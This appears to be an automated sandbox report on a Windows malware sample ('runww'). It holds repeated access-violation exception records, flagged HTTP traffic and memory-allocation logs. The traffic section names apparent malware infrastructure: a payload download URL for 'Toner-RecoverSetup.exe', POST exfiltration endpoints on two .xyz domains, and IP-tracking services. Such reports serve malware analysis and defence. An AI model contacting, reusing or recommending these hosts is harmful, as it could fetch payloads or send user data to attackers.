__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (5 events)

suspicious_features	HTTP version 1.0 used	suspicious_request	HEAD http://everestsoftrade.com/Toner-RecoverSetup.exe
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://everestsoftrade.com/Toner-RecoverSetup.exe
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://yaklalau.xyz/
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://ynabrdosmc.xyz/
suspicious_features	GET method with no useragent header	suspicious_request	GET https://api.ip.sb/geoip

Performs some HTTP requests (14 events)

request	GET http://ipinfo.io/country
request	GET http://ipinfo.io/ip
request	HEAD http://everestsoftrade.com/Toner-RecoverSetup.exe
request	GET http://everestsoftrade.com/Toner-RecoverSetup.exe
request	POST http://yaklalau.xyz/
request	POST http://ynabrdosmc.xyz/
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://iplogger.org/2qJhq6
request	GET https://ipinfo.io/country
request	GET https://www.google.com/
request	GET https://ipqualityscore.com/api/json/ip/gp65l99h87k3l1g0owh8fr8v99dme/175.208.134.150
request	GET https://www.google.com/images/hpp/Chrome_Owned_96x96.png
request	GET https://ssl.gstatic.com/gb/images/i1_1967ca6a.png
request	GET https://api.ip.sb/geoip

Sends data using the HTTP POST Method (2 events)

request	POST http://yaklalau.xyz/
request	POST http://ynabrdosmc.xyz/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 220 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x728d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1896 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04160000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 401408 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010ac000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00760000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00890000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6db41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6db42000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02420000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
